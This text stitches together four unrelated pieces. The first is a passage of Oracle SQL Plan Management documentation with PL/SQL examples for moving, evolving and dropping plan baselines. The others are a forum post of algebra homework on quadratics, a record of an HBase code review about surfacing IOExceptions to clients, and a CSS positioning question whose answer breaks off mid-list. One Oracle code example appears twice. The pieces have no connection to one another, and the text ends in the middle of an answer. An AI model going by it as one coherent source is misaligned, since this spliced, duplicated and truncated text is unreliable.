2. On the source database, pack the SQL plan baselines you want to export from the SQL management base into the staging table.

   The following example packs enabled plan baselines created by user spm into staging table stage1. Select SQL plan baselines using the plan name (plan_name), SQL handle (sql_handle), or any other plan criteria. The table_name parameter is mandatory.

   DECLARE
     my_plans NUMBER;
   BEGIN
     my_plans := DBMS_SPM.PACK_STGTAB_BASELINE (
       table_name => 'stage1'
     , enabled    => 'yes'
     , creator    => 'spm'
     );
   END;
   /

3. Export the staging table stage1 into a dump file using Oracle Data Pump Export (a sketch of the Data Pump commands appears after this procedure).

4. Transfer the dump file to the host of the destination database.

5. On the destination database, import the staging table stage1 from the dump file using the Oracle Data Pump Import utility.

6. On the destination database, unpack the SQL plan baselines from the staging table into the SQL management base.

   The following example unpacks all fixed plan baselines stored in the staging table stage1:

   DECLARE
     my_plans NUMBER;
   BEGIN
     my_plans := DBMS_SPM.UNPACK_STGTAB_BASELINE (
       table_name => 'stage1'
     , fixed      => 'yes'
     );
   END;
   /
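Steps 3 through 5 rely on Oracle Data Pump, whose command lines are not shown in the procedure above. A minimal sketch run at the operating system prompt; the connect strings and the DATA_PUMP_DIR directory object are assumptions for the example:

# On the source host: export the staging table to a dump file.
expdp spm@src_db DIRECTORY=DATA_PUMP_DIR DUMPFILE=stage1.dmp TABLES=stage1

# After transferring stage1.dmp to the destination host, import the table.
impdp spm@dest_db DIRECTORY=DATA_PUMP_DIR DUMPFILE=stage1.dmp TABLES=stage1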
The following example unpacks all fixed plan baselines stored in the staging table stage1:

DECLARE
  my_plans NUMBER;
BEGIN
  my_plans := DBMS_SPM.UNPACK_STGTAB_BASELINE (
    table_name => 'stage1'
,   fixed      => 'yes' );
END;
/

See Also: Oracle Database PL/SQL Packages and Types Reference to learn about the DBMS_SPM.UNPACK_STGTAB_BASELINE function

23.5 Evolving SQL Plan Baselines Manually

Oracle recommends that you configure the SQL Plan Management Evolve task to run automatically, as explained in "Managing the SPM Evolve Advisor Task". You can also use PL/SQL or Cloud Control to manually evolve an unaccepted plan to determine whether it performs better than any plan currently in the plan baseline. This section contains the following topics:

23.5.1 About the DBMS_SPM Evolve Functions

Table 23-5 describes the most relevant DBMS_SPM procedures and functions for managing plan evolution. Execute evolution tasks manually or schedule them to run automatically.

Table 23-5 DBMS_SPM Functions and Procedures for Managing Plan Evolution Tasks

Package    Procedure or Function      Description
DBMS_SPM   ACCEPT_SQL_PLAN_BASELINE   This function accepts one recommendation to evolve a single plan into a SQL plan baseline.
DBMS_SPM   CREATE_EVOLVE_TASK         This function creates an advisor task to prepare the plan evolution of one or more plans for a specified SQL statement. The input parameters can be a SQL handle, plan name or a list of plan names, time limit, task name, and description.
DBMS_SPM   EXECUTE_EVOLVE_TASK        This function executes an evolution task. The input parameters can be the task name, execution name, and execution description. If not specified, the advisor generates the name, which is returned by the function.
DBMS_SPM   IMPLEMENT_EVOLVE_TASK      This function implements all recommendations for an evolve task. Essentially, this function is equivalent to using ACCEPT_SQL_PLAN_BASELINE for all recommended plans. Input parameters include task name, plan name, owner name, and execution name.
DBMS_SPM   REPORT_EVOLVE_TASK         This function displays the results of an evolve task as a CLOB. Input parameters include the task name and section of the report to include.
DBMS_SPM   SET_EVOLVE_TASK_PARAMETER  This function updates the value of an evolve task parameter. In this release, the only valid parameter is TIME_LIMIT.

Oracle recommends that you configure SPM Evolve Advisor to run automatically (see "Configuring the Automatic SPM Evolve Advisor Task"). You can also evolve SQL plan baselines manually. Figure 23-4 shows the basic workflow for managing SQL plan management tasks.

Figure 23-4 Evolving SQL Plan Baselines

Typically, you manage SQL plan evolution tasks in the following sequence:
1. Create an evolve task
2. Optionally, set evolve task parameters
3. Execute the evolve task
4. Implement the recommendations in the task
5. Report on the task outcome

See Also: Oracle Database PL/SQL Packages and Types Reference for information about the DBMS_SPM package

23.5.2 Managing an Evolve Task

This section describes a typical use case in which you create and execute a task, and then implement its recommendations. Table 23-6 describes some parameters of the CREATE_EVOLVE_TASK function.

Table 23-6 DBMS_SPM.CREATE_EVOLVE_TASK Parameters

Function Parameter  Description
sql_handle          SQL handle of the statement. The default NULL considers all SQL statements with unaccepted plans.
plan_name           Plan identifier. The default NULL means consider all unaccepted plans of the specified SQL handle or all SQL statements if the SQL handle is NULL.
time_limit Time limit in number of minutes. The time limit for first unaccepted plan equals the input value. The time limit for the second unaccepted plan equals the input value minus the time spent in first plan verification, and so on. The default DBMS_SPM.AUTO_LIMIT means let the system choose an appropriate time limit based on the number of plan verifications required to be done. task_name User-specified name of the evolution task. This section explains how to evolve plan baselines from the command line. In Cloud Control, from the SQL Plan Baseline subpage (shown in Figure 23-3), select a plan, and then click Evolve. Assumptions This tutorial assumes the following: • You do not have the automatic evolve task enabled (see "Managing the SPM Evolve Advisor Task"). • You want to create a SQL plan baseline for the following query: SELECT /* q1_group_by */ prod_name, sum(quantity_sold) FROM products p, sales s WHERE p.prod_id = s.prod_id AND p.prod_category_id =203 GROUP BY prod_name; • You want to create two indexes to improve the query performance, and then evolve the plan that uses these indexes if it performs better than the plan currently in the plan baseline. To evolve a specified plan:  1. Perform the initial setup as follows: 1. Connect SQL*Plus to the database with administrator privileges, and then prepare for the tutorial by flushing the shared pool and the buffer cache: ALTER SYSTEM FLUSH SHARED_POOL; ALTER SYSTEM FLUSH BUFFER_CACHE; 2. Enable the automatic capture of SQL plan baselines. For example, enter the following statement: ALTER SYSTEM SET OPTIMIZER_CAPTURE_SQL_PLAN_BASELINES=true; 3. Connect to the database as user sh, and then set SQL*Plus display parameters: CONNECT sh -- enter password SET PAGES 10000 LINES 140 SET SERVEROUTPUT ON COL SQL_TEXT FORMAT A20 COL SQL_HANDLE FORMAT A20 COL PLAN_NAME FORMAT A30 COL ORIGIN FORMAT A12 SET LONGC 60535 SET LONG 60535 SET ECHO ON 2. Execute the SELECT statements so that SQL plan management captures them: 1. Execute the SELECT /* q1_group_by */ statement for the first time. Because the database only captures plans for repeatable statements, the plan baseline for this statement is empty. 2. Query the data dictionary to confirm that no plans exist in the plan baseline. For example, execute the following query (sample output included): SELECT SQL_HANDLE, SQL_TEXT, PLAN_NAME, ORIGIN, ENABLED, ACCEPTED, FIXED, AUTOPURGE FROM DBA_SQL_PLAN_BASELINES WHERE SQL_TEXT LIKE '%q1_group%'; no rows selected SQL plan management only captures repeatable statements, so this result is expected. 3. Execute the SELECT /* q1_group_by */ statement for the second time. 3. Query the data dictionary to ensure that the plans were loaded into the plan baseline for the statement. Example 23-4 executes the following query (sample output included). Example 23-4 DBA_SQL_PLAN_BASELINES SELECT SQL_HANDLE, SQL_TEXT, PLAN_NAME, ORIGIN, ENABLED, ACCEPTED, FIXED FROM DBA_SQL_PLAN_BASELINES WHERE SQL_TEXT LIKE '%q1_group%'; SQL_HANDLE SQL_TEXT PLAN_NAME ORIGIN ENA ACC FIX -------------------- -------------------- ------------------------------ ------------ --- --- --- SQL_07f16c76ff893342 SELECT /* q1_group_b SQL_PLAN_0gwbcfvzskcu242949306 AUTO-CAPTURE YES YES NO y */ prod_name, sum( quantity_sold) FROM products p, s ales s WHERE p.prod_id = s .prod_id AND p.prod_catego ry_id =203 GROUP BY prod_name The output shows that the plan is accepted, which means that it is in the plan baseline for the statement. 
Also, the origin is AUTO-CAPTURE, which means that the statement was automatically captured and not manually loaded. 4. Explain the plan for the statement and verify that the optimizer is using this plan. For example, explain the plan as follows, and then display it: EXPLAIN PLAN FOR SELECT /* q1_group_by */ prod_name, sum(quantity_sold) FROM products p, sales s WHERE p.prod_id = s.prod_id AND p.prod_category_id =203 GROUP BY prod_name; SELECT * FROM TABLE(DBMS_XPLAN.DISPLAY(null, null, 'basic +note')); Sample output appears below: Plan hash value: 1117033222 ------------------------------------------ | Id | Operation | Name | ------------------------------------------ | 0 | SELECT STATEMENT | | | 1 | HASH GROUP BY | | | 2 | HASH JOIN | | | 3 | TABLE ACCESS FULL | PRODUCTS | | 4 | PARTITION RANGE ALL| | | 5 | TABLE ACCESS FULL | SALES | ------------------------------------------ Note ----- - SQL plan baseline "SQL_PLAN_0gwbcfvzskcu242949306" used for this statement The note indicates that the optimizer is using the plan shown with the plan name listed in Example 23-4. 5. Create two indexes to improve the performance of the SELECT /* q1_group_by */ statement. For example, use the following statements: CREATE INDEX ind_prod_cat_name ON products(prod_category_id, prod_name, prod_id); CREATE INDEX ind_sales_prod_qty_sold ON sales(prod_id, quantity_sold); 6. Execute the select /* q1_group_by */ statement again. Because automatic capture is enabled, the plan baseline is populated with the new plan for this statement. 7. Query the data dictionary to ensure that the plan was loaded into the SQL plan baseline for the statement. Example 23-5 executes the following query (sample output included). Example 23-5 DBA_SQL_PLAN_BASELINES SELECT SQL_HANDLE, SQL_TEXT, PLAN_NAME, ORIGIN, ENABLED, ACCEPTED FROM DBA_SQL_PLAN_BASELINES WHERE SQL_HANDLE IN ('SQL_07f16c76ff893342') ORDER BY SQL_HANDLE, ACCEPTED; SQL_HANDLE SQL_TEXT PLAN_NAME ORIGIN ENA ACC -------------------- -------------------- ------------------------------ ------------ --- --- SQL_07f16c76ff893342 SELECT /* q1_group_b SQL_PLAN_0gwbcfvzskcu20135fd6c AUTO-CAPTURE YES NO y */ prod_name, sum( quantity_sold) FROM products p, s ales s WHERE p.prod_id = s .prod_id AND p.prod_catego ry_id =203 GROUP BY prod_name SQL_07f16c76ff893342 SELECT /* q1_group_b SQL_PLAN_0gwbcfvzskcu242949306 AUTO-CAPTURE YES YES y */ prod_name, sum( quantity_sold) FROM products p, s ales s WHERE p.prod_id = s .prod_id AND p.prod_catego ry_id =203 GROUP BY prod_name The output shows that the new plan is unaccepted, which means that it is in the statement history but not the SQL plan baseline. 8. Explain the plan for the statement and verify that the optimizer is using the original nonindexed plan. 
For example, explain the plan as follows, and then display it: EXPLAIN PLAN FOR SELECT /* q1_group_by */ prod_name, sum(quantity_sold) FROM products p, sales s WHERE p.prod_id = s.prod_id AND p.prod_category_id =203 GROUP BY prod_name; SELECT * FROM TABLE(DBMS_XPLAN.DISPLAY(null, null, 'basic +note')); Sample output appears below: Plan hash value: 1117033222 ------------------------------------------ | Id | Operation | Name | ------------------------------------------ | 0 | SELECT STATEMENT | | | 1 | HASH GROUP BY | | | 2 | HASH JOIN | | | 3 | TABLE ACCESS FULL | PRODUCTS | | 4 | PARTITION RANGE ALL| | | 5 | TABLE ACCESS FULL | SALES | ------------------------------------------ Note ----- - SQL plan baseline "SQL_PLAN_0gwbcfvzskcu242949306" used for this statement The note indicates that the optimizer is using the plan shown with the plan name listed in Example 23-4. 9. Connect as an administrator, and then create an evolve task that considers all SQL statements with unaccepted plans. For example, execute the DBMS_SPM.CREATE_EVOLVE_TASK function and then obtain the name of the task: CONNECT / AS SYSDBA VARIABLE cnt NUMBER VARIABLE tk_name VARCHAR2(50) VARIABLE exe_name VARCHAR2(50) VARIABLE evol_out CLOB EXECUTE :tk_name := DBMS_SPM.CREATE_EVOLVE_TASK( sql_handle => 'SQL_07f16c76ff893342', plan_name => 'SQL_PLAN_0gwbcfvzskcu20135fd6c'); SELECT :tk_name FROM DUAL; The following sample output shows the name of the task: :EVOL_OUT ------------------------------------------------------------------------------ TASK_11 Now that the task has been created and has a unique name, execute the task. 10. Execute the task. For example, execute the DBMS_SPM.EXECUTE_EVOLVE_TASK function (sample output included): EXECUTE :exe_name :=DBMS_SPM.EXECUTE_EVOLVE_TASK(task_name=>:tk_name); SELECT :exe_name FROM DUAL; :EXE_NAME ------------------------------------------------------------------------------- EXEC_1 11. View the report. 
For example, execute the DBMS_SPM.REPORT_EVOLVE_TASK function (sample output included): EXECUTE :evol_out := DBMS_SPM.REPORT_EVOLVE_TASK( task_name=>:tk_name, execution_name=>:exe_name ); SELECT :evol_out FROM DUAL; GENERAL INFORMATION SECTION ------------------------------------------------------------------------------ Task Information: --------------------------------------------- Task Name : TASK_11 Task Owner : SYS Execution Name : EXEC_1 Execution Type : SPM EVOLVE Scope : COMPREHENSIVE Status : COMPLETED Started : 01/09/2012 12:21:27 Finished : 01/09/2012 12:21:29 Last Updated : 01/09/2012 12:21:29 Global Time Limit : 2147483646 Per-Plan Time Limit : UNUSED Number of Errors : 0 ------------------------------------------------------------------------------- SUMMARY SECTION ------------------------------------------------------------------------------- Number of plans processed : 1 Number of findings : 1 Number of recommendations : 1 Number of errors : 0 ------------------------------------------------------------------------------- DETAILS SECTION ------------------------------------------------------------------------------- Object ID : 2 Test Plan Name : SQL_PLAN_0gwbcfvzskcu20135fd6c Base Plan Name : SQL_PLAN_0gwbcfvzskcu242949306 SQL Handle : SQL_07f16c76ff893342 Parsing Schema : SH Test Plan Creator : SH SQL Text : SELECT /* q1_group_by */ prod_name, sum(quantity_sold) FROM products p, sales s WHERE p.prod_id = s.prod_id AND p.prod_category_id =203 GROUP BY prod_name Execution Statistics: ----------------------------- Base Plan Test Plan ---------------------------- ---------------------------- Elapsed Time (s): .044336 .012649 CPU Time (s): .044003 .012445 Buffer Gets: 360 99 Optimizer Cost: 924 891 Disk Reads: 341 82 Direct Writes: 0 0 Rows Processed: 4 2 Executions: 5 9 FINDINGS SECTION ------------------------------------------------------------------------------- Findings (1): ----------------------------- 1. The plan was verified in 2.18 seconds. It passed the benefit criterion because its verified performance was 2.01 times better than that of the baseline plan. Recommendation: ----------------------------- Consider accepting the plan. 
Execute dbms_spm.accept_sql_plan_baseline(task_name => 'TASK_11', object_id => 2, task_owner => 'SYS');

EXPLAIN PLANS SECTION
-------------------------------------------------------------------------------

Baseline Plan
-----------------------------
Plan Id         : 1
Plan Hash Value : 1117033222

-------------------------------------------------------------------------------
| Id | Operation           | Name     | Rows   | Bytes    | Cost | Time     |
-------------------------------------------------------------------------------
|  0 | SELECT STATEMENT    |          |     21 |      861 |  924 | 00:00:12 |
|  1 | HASH GROUP BY       |          |     21 |      861 |  924 | 00:00:12 |
| *2 | HASH JOIN           |          | 267996 | 10987836 |  742 | 00:00:09 |
| *3 | TABLE ACCESS FULL   | PRODUCTS |     21 |      714 |    2 | 00:00:01 |
|  4 | PARTITION RANGE ALL |          | 918843 |  6431901 |  662 | 00:00:08 |
|  5 | TABLE ACCESS FULL   | SALES    | 918843 |  6431901 |  662 | 00:00:08 |
-------------------------------------------------------------------------------

Predicate Information (identified by operation id):
------------------------------------------
* 2 - access("P"."PROD_ID"="S"."PROD_ID")
* 3 - filter("P"."PROD_CATEGORY_ID"=203)

Test Plan
-----------------------------
Plan Id         : 2
Plan Hash Value : 20315500

----------------------------------------------------------------------------------------------
| Id | Operation            | Name                    | Rows   | Bytes    | Cost | Time     |
----------------------------------------------------------------------------------------------
|  0 | SELECT STATEMENT     |                         |     21 |      861 |  891 | 00:00:11 |
|  1 | SORT GROUP BY NOSORT |                         |     21 |      861 |  891 | 00:00:11 |
|  2 | NESTED LOOPS         |                         | 267996 | 10987836 |  891 | 00:00:11 |
| *3 | INDEX RANGE SCAN     | IND_PROD_CAT_NAME       |     21 |      714 |    1 | 00:00:01 |
| *4 | INDEX RANGE SCAN     | IND_SALES_PROD_QTY_SOLD |  12762 |    89334 |   42 | 00:00:01 |
----------------------------------------------------------------------------------------------

Predicate Information (identified by operation id):
------------------------------------------
* 3 - access("P"."PROD_CATEGORY_ID"=203)
* 4 - access("P"."PROD_ID"="S"."PROD_ID")

This report indicates that the new execution plan, which uses the two new indexes, performs better than the original plan.

12. Implement the recommendations of the evolve task. For example, execute the IMPLEMENT_EVOLVE_TASK function:

EXECUTE :cnt := DBMS_SPM.IMPLEMENT_EVOLVE_TASK( task_name=>:tk_name, execution_name=>:exe_name );

13. Query the data dictionary to ensure that the new plan is accepted. Example 23-6 shows the output of the same DBA_SQL_PLAN_BASELINES query that was used in Example 23-5 (sample output included).

Example 23-6 DBA_SQL_PLAN_BASELINES

SQL_HANDLE           SQL_TEXT                              PLAN_NAME                      ORIGIN       ENA ACC
-------------------- ------------------------------------- ------------------------------ ------------ --- ---
SQL_07f16c76ff893342 SELECT /* q1_group_by */ prod_name,   SQL_PLAN_0gwbcfvzskcu20135fd6c AUTO-CAPTURE YES YES
                     sum(quantity_sold) FROM products p,
                     sales s WHERE p.prod_id = s.prod_id
                     AND p.prod_category_id =203
                     GROUP BY prod_name
SQL_07f16c76ff893342 SELECT /* q1_group_by */ prod_name,   SQL_PLAN_0gwbcfvzskcu242949306 AUTO-CAPTURE YES YES
                     sum(quantity_sold) FROM products p,
                     sales s WHERE p.prod_id = s.prod_id
                     AND p.prod_category_id =203
                     GROUP BY prod_name

The output shows that the new plan is accepted.

14. Clean up after the example.
For example, enter the following statements:

EXEC :cnt := DBMS_SPM.DROP_SQL_PLAN_BASELINE('SQL_07f16c76ff893342');
EXEC :cnt := DBMS_SPM.DROP_SQL_PLAN_BASELINE('SQL_9049245213a986b3');
EXEC :cnt := DBMS_SPM.DROP_SQL_PLAN_BASELINE('SQL_bb77077f5f90a36b');
EXEC :cnt := DBMS_SPM.DROP_SQL_PLAN_BASELINE('SQL_02a86218930bbb20');
DELETE FROM SQLLOG$;
CONNECT sh
-- enter password
DROP INDEX IND_SALES_PROD_QTY_SOLD;
DROP INDEX IND_PROD_CAT_NAME;

See Also: Oracle Database PL/SQL Packages and Types Reference for information about using the DBMS_SPM evolve functions

23.6 Dropping SQL Plan Baselines

You can remove some or all plans from a SQL plan baseline. This technique is sometimes useful when testing SQL plan management. Drop plans with the DBMS_SPM.DROP_SQL_PLAN_BASELINE function. This function returns the number of dropped plans. Table 23-7 describes its input parameters.

Table 23-7 DROP_SQL_PLAN_BASELINE Parameters

Function Parameter  Description
sql_handle          SQL statement identifier.
plan_name           Name of a specific plan. Default NULL drops all plans associated with the SQL statement identified by sql_handle.

This section explains how to drop baselines from the command line. In Cloud Control, from the SQL Plan Baseline subpage (shown in Figure 23-3), select a plan, and then click Drop.

Assumptions

This tutorial assumes that you want to drop all plans for the following SQL statement, effectively dropping the SQL plan baseline:

SELECT /* repeatable_sql */ COUNT(*) FROM hr.jobs;

To drop a SQL plan baseline:

1. Connect SQL*Plus to the database with the appropriate privileges, and then query the data dictionary for the plan baseline. Example 23-7 executes the following query (sample output included).

Example 23-7 DBA_SQL_PLAN_BASELINES

SQL> SELECT SQL_HANDLE, SQL_TEXT, PLAN_NAME, ORIGIN,
  2         ENABLED, ACCEPTED
  3  FROM   DBA_SQL_PLAN_BASELINES
  4  WHERE  SQL_TEXT LIKE 'SELECT /* repeatable_sql%';

SQL_HANDLE           SQL_TEXT             PLAN_NAME                      ORIGIN         ENA ACC
-------------------- -------------------- ------------------------------ -------------- --- ---
SQL_b6b0d1c71cd1807b SELECT /* repeatable SQL_PLAN_bdc6jswfd303v2f1e9c20 AUTO-CAPTURE   YES YES
                     _sql */ count(*) fro
                     m hr.jobs

2. Drop the SQL plan baseline for the statement. The following example drops the plan baseline with the SQL handle SQL_b6b0d1c71cd1807b, and returns the number of dropped plans. Specify plan baselines using the plan name (plan_name), the SQL handle (sql_handle), or both.

DECLARE
  v_dropped_plans number;
BEGIN
  v_dropped_plans := DBMS_SPM.DROP_SQL_PLAN_BASELINE (
     sql_handle => 'SQL_b6b0d1c71cd1807b'
);
  DBMS_OUTPUT.PUT_LINE('dropped ' || v_dropped_plans || ' plans');
END;
/

3. Confirm that the plans were dropped. For example, execute the following query:

SELECT SQL_HANDLE, SQL_TEXT, PLAN_NAME, ORIGIN, ENABLED, ACCEPTED
FROM   DBA_SQL_PLAN_BASELINES
WHERE  SQL_TEXT LIKE 'SELECT /* repeatable_sql%';

no rows selected

See Also: Oracle Database PL/SQL Packages and Types Reference to learn about the DROP_SQL_PLAN_BASELINE function

23.7 Managing the SQL Management Base

The SQL management base is a part of the data dictionary that resides in the SYSAUX tablespace. It stores statement logs, plan histories, SQL plan baselines, and SQL profiles. This section explains how to change the disk space usage parameters for the SMB, and change the retention time for plans in the SMB. The DBA_SQL_MANAGEMENT_CONFIG view shows the current configuration settings for the SMB. Table 23-8 describes the parameters in the PARAMETER_NAME column.
Table 23-8 Parameters in DBA_SQL_MANAGEMENT_CONFIG.PARAMETER_NAME Parameter Description SPACE_BUDGET_PERCENT Maximum percent of SYSAUX space that the SQL management base can use. The default is 10. The allowable range for this limit is between 1% and 50%. PLAN_RETENTION_WEEKS Number of weeks to retain unused plans before they are purged. The default is 53. 23.7.1 Changing the Disk Space Limit for the SMB A weekly background process measures the total space occupied by the SMB. When the defined limit is exceeded, the process writes a warning to the alert log. The database generates alerts weekly until either the SMB space limit is increased, the size of the SYSAUX tablespace is increased, or the disk space used by the SMB is decreased by purging SQL management objects (SQL plan baselines or SQL profiles). This task explains how to change the limit with the DBMS_SPM.CONFIGURE procedure. Assumptions This tutorial assumes the following: • The current SMB space limit is the default of 10%. • You want to change the percentage limit to 30% To change the percentage limit of the SMB:  1. Connect SQL*Plus to the database with the appropriate privileges, and then query the data dictionary to see the current space budget percent. For example, execute the following query (sample output included): SELECT PARAMETER_NAME, PARAMETER_VALUE AS "%_LIMIT", ( SELECT sum(bytes/1024/1024) FROM DBA_DATA_FILES WHERE TABLESPACE_NAME = 'SYSAUX' ) AS SYSAUX_SIZE_IN_MB, PARAMETER_VALUE/100 * ( SELECT sum(bytes/1024/1024) FROM DBA_DATA_FILES WHERE TABLESPACE_NAME = 'SYSAUX' ) AS "CURRENT_LIMIT_IN_MB" FROM DBA_SQL_MANAGEMENT_CONFIG WHERE PARAMETER_NAME = 'SPACE_BUDGET_PERCENT'; PARAMETER_NAME %_LIMIT SYSAUX_SIZE_IN_MB CURRENT_LIMIT_IN_MB ------------------------------ ---------- ----------------- ------------------- SPACE_BUDGET_PERCENT 10 211.4375 21.14375 2. Change the percentage setting. For example, execute the following command to change the setting to 30%: EXECUTE DBMS_SPM.CONFIGURE('space_budget_percent',30); 3. Query the data dictionary to confirm the change. For example, execute the following join (sample output included): SELECT PARAMETER_NAME, PARAMETER_VALUE AS "%_LIMIT", ( SELECT sum(bytes/1024/1024) FROM DBA_DATA_FILES WHERE TABLESPACE_NAME = 'SYSAUX' ) AS SYSAUX_SIZE_IN_MB, PARAMETER_VALUE/100 * ( SELECT sum(bytes/1024/1024) FROM DBA_DATA_FILES WHERE TABLESPACE_NAME = 'SYSAUX' ) AS "CURRENT_LIMIT_IN_MB" FROM DBA_SQL_MANAGEMENT_CONFIG WHERE PARAMETER_NAME = 'SPACE_BUDGET_PERCENT'; PARAMETER_NAME %_LIMIT SYSAUX_SIZE_IN_MB CURRENT_LIMIT_IN_MB ------------------------------ ---------- ----------------- ------------------- SPACE_BUDGET_PERCENT 30 211.4375 63.43125 See Also: Oracle Database PL/SQL Packages and Types Reference to learn about the CONFIGURE function 23.7.2 Changing the Plan Retention Policy in the SMB A weekly scheduled purging task manages disk space used by SQL plan management. The task runs as an automated task in the maintenance window. The database purges plans that have not been used for longer than the plan retention period, as identified by the LAST_EXECUTED timestamp stored in the SMB for that plan. The default retention period is 53 weeks. The period can range between 5 and 523 weeks. This task explains how to change the plan retention period with the DBMS_SPM.CONFIGURE procedure. In Cloud Control, set the plan retention policy in the SQL Plan Baseline subpage (shown in Figure 23-3). To change the plan retention period for the SMB:  1. 
Connect SQL*Plus to the database with the appropriate privileges, and then query the data dictionary to see the current plan retention period. For example, execute the following query (sample output included): SQL> SELECT PARAMETER_NAME, PARAMETER_VALUE 2 FROM DBA_SQL_MANAGEMENT_CONFIG 3 WHERE PARAMETER_NAME = 'PLAN_RETENTION_WEEKS'; PARAMETER_NAME PARAMETER_VALUE ------------------------------ --------------- PLAN_RETENTION_WEEKS 53 2. Change the retention period. For example, execute the CONFIGURE procedure to change the period to 105 weeks: EXECUTE DBMS_SPM.CONFIGURE('plan_retention_weeks',105); 3. Query the data dictionary to confirm the change. For example, execute the following query: SQL> SELECT PARAMETER_NAME, PARAMETER_VALUE 2 FROM DBA_SQL_MANAGEMENT_CONFIG 3 WHERE PARAMETER_NAME = 'PLAN_RETENTION_WEEKS'; PARAMETER_NAME PARAMETER_VALUE ------------------------------ --------------- PLAN_RETENTION_WEEKS 105 See Also: Oracle Database PL/SQL Packages and Types Reference to learn about the DBMS_SPM.CONFIGURE procedure
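Both SMB settings can also be checked in one pass. As a small sketch (not part of the tutorials above, but using only the DBA_SQL_MANAGEMENT_CONFIG view they already rely on), the following query lists every SMB configuration parameter and its current value:

SELECT PARAMETER_NAME, PARAMETER_VALUE
FROM   DBA_SQL_MANAGEMENT_CONFIG
ORDER  BY PARAMETER_NAME;

Among other rows, this returns SPACE_BUDGET_PERCENT and PLAN_RETENTION_WEEKS (see Table 23-8), so it is a quick way to confirm both of the changes made in the preceding sections.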
Posted by on Sunday, December 12, 2010 at 12:46am.

For questions 1-2, apply the quadratic formula to find the roots of the given function, and then graph the function.
1. (6 points) f(x) = x² + 4
2. g(x) = x² - x - 12
For questions 3-4, factor the quadratic expression completely, and find the roots of the expression.
3. (3 points) 20x² + 13x + 2
4. (3 points) 49x² - 14x - 3
For question 5, complete the square, and find the roots of the quadratic equation.
5. (3 points) x² + 16x = 0
In questions 6-10, use the discriminant to determine the number of solutions of the quadratic equation, and whether the solutions are real or complex. Note: It is not necessary to find the roots; just determine the number and types of solutions.
6. (3 points) x² + 6x - 7 = 0
7. (3 points) z² + z + 1 = 0
8. (3 points) √3·y² - 4y - 7√3 = 0 (posted as "(3)1/2y2 - 4y - 7(3)1/2 = 0", where (3)1/2 means the square root of 3)
9. (3 points) 2x² - 10x + 25 = 0
10. (3 points) 2x² - 6x + 5 = 0
11. (5 points) Steve traveled 200 miles at a certain speed. Had he gone 10 mph faster, the trip would have taken 1 hour less. Find the speed of his vehicle.
12. (5 points) The Hudson River flows at a rate of 3 miles per hour. A patrol boat travels 60 miles upriver, and returns in a total time of 9 hours. What is the speed of the boat in still water?
13. (5 points) A designer attempts to arrange the characters of his artwork in the form of a square grid with equal numbers of rows and columns, but finds that 24 characters are left out. When he tries to add one more row and column, he finds that he has 25 too few characters. Find the number of characters used by the designer.

• College Math - , Sunday, December 12, 2010 at 1:16am
We don't do homework here. We assist with it. We don't draw graphs either. Which problem do you need the most help with? We will be glad to critique your thought process. Exponents should be preceded by ^. I do not understand the significance of the (3)'s in question 8.

• College Math - , Monday, December 13, 2010 at 4:00am
This isn't homework.

• College Math - , Friday, March 2, 2012 at 10:33am
It is homework, I am doing the problems right now in Week 5 Assignment 2 of College Math at the AIPOD.
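The discriminant questions above all reduce to one computation. As a worked illustration (added here for reference, not part of the original posting), questions 6 and 7 go as follows:

For x² + 6x - 7 = 0:  Δ = b² - 4ac = 6² - 4(1)(-7) = 36 + 28 = 64 > 0, so there are two distinct real solutions.
For z² + z + 1 = 0:   Δ = 1² - 4(1)(1) = -3 < 0, so there are two complex (conjugate) solutions and no real ones.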
HBASE-2519. Expose IOEs up to client

Review Request #75 - Created May 21, 2010 and submitted
Todd Lipcon | old-hbase | HBASE-2519 | hbase | ryanobjc

Description: In particular, this fixes issues where a compaction that got an error on one storefile would happily proceed and just remove all that data, or where a user scan would just show empty results instead of an error.

Testing done: new unit tests.

Review discussion:

- "Why are we creating a reader here? The incoming store file list is already opened... Re-opening the file might not be the best choice, since if the on-disk situation becomes different from the in-memory one, we should probably be failing the compactions. Thus the code should be like what it was before, only throwing an exception instead of continuing on."
  - "createReader is lazy - if the file is already open it returns the existing one. I changed to create() since it was handy to use from the tests (and some other patches on top of this use it in that way as well)."
- "Remove this pointless catch, it just muddles the stack trace."
  - "The point of this is that you get the toString of the StoreFileScanner, which includes path name, etc. Otherwise you often get a less useful error like "Could not get block locations for blk_234234, aborting". So while the stack trace is definitely longer, I think there is actual value in having as much information here as possible."
- "Ditto, remove the try/catch and let the exception bubble up."
- "There are 2 spaces before `throws', need just 1."
  - "Just testing review board. Follow-up test."
- "One more test. Also I hope we're going to fix the whole situation with IOExceptions all over the place. They're defeating the whole purpose of checked exceptions and are *really* annoying in client code (code that uses HBase)."
- "I didn't note that; ok, then let's keep it."
- "This patch is radical. It's going to throw up some new stuff. Best to get it in now. I had two minor issues. I can fix on commit."
- "Why not remove the try/catch and just let the IOE out?"
- "Same here (remove the try/catch and just let the IOE out)."
- "I'm going to commit this."
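The second exchange above is the heart of the change: keep the try/catch, but rethrow with the scanner's context instead of swallowing the error. A rough sketch of that pattern follows (illustrative only; the method, the delegate call, and the message are not the actual patch):

public boolean seek(KeyValue key) throws IOException {
    try {
        return delegateSeek(key);  // hypothetical underlying seek
    } catch (IOException ioe) {
        // Rethrow with this scanner's toString(), which carries the store
        // file path; a bare "Could not get block locations" message does not.
        throw new IOException("Could not seek " + this, ioe);
    }
}

The stack trace gets one frame longer, but the exception now identifies which store file failed.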
Cody Ma - 6 months ago

CSS Question: Relative and absolute positioning confusion

I'm new to html/css and I've just started wrapping my head around positioning, but I seem to have a misunderstanding. Right now I'm trying to create a page header with a horizontal divider right below it. My header is positioned absolutely, with a top and left value of 0, and a height of 88px. I thought that if I gave my horizontal divider position: relative, and a height of 5px, it would end up right below my header. Instead, it's ending up at the very top of the page, and I'm confused as to why. I would like to use this horizontal divider again on my page, right above my footer, so I don't want to give this horizontal divider position: absolute and top: 88px. Any help is appreciated, thanks so much!

My (very simple) code so far:

<div id="header"></div>
<div class="horizontal-divider"></div>

#header {
  position: absolute;
  top: 0px;
  left: 0px;
  height: 88px;
  width: 100%;
}

.horizontal-divider {
  position: relative;
  height: 5px;
  width: 100%;
  top: 0px;
  background-color: white;
  border: 1px solid black;
}

Answer

Absolute positioning positions an element with respect to the edges of its containing block. Its containing block is its closest ancestor that has position set to anything that isn't static. It also takes the element out of normal flow, so it doesn't influence the position of anything that follows it.

Relative positioning positions an element with respect to where it would be positioned if it was position: static (not with respect to any other element).

Since #header is absolutely positioned, .horizontal-divider is not positioned after it. If you want an element to be rendered immediately after an absolutely positioned element, then:

1. Don't absolutely position the first element
